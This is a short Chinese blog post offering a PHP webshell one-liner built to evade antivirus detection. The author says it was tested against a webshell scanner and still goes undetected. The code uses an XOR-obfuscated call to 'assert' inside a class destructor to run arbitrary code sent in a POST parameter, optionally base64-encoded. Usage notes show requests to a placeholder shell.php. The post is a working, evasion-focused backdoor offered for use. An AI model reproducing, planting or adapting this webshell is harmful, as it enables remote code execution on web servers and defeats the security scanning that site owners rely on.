前言

最新免杀php变种一句话,亲测过啊D,不知道什么时候加入特征库报毒,反正现在能用吧。

最新Webshell免杀PHP一句话变种-Ti0s's Blog


class VMTX{
    function __destruct(){
        $BRLI='f$vjcT'^"\x7\x57\x5\xf\x11\x20";
        return @$BRLI("$this->EKDL");
    }
}
$vmtx=new VMTX();
@$vmtx->EKDL=isset($_GET['id'])?base64_decode($_POST['mr6']):$_POST['mr6'];

说明

http://www.xxx.com/shell.php  
POST: mr6=phpinfo();  //与普通shell相同

http://www.xxx.com/shell.php?id=xxx(xxxx随便修改)
POST: mr6=cGhwaW5mbygpOwo=  //payload的base64编码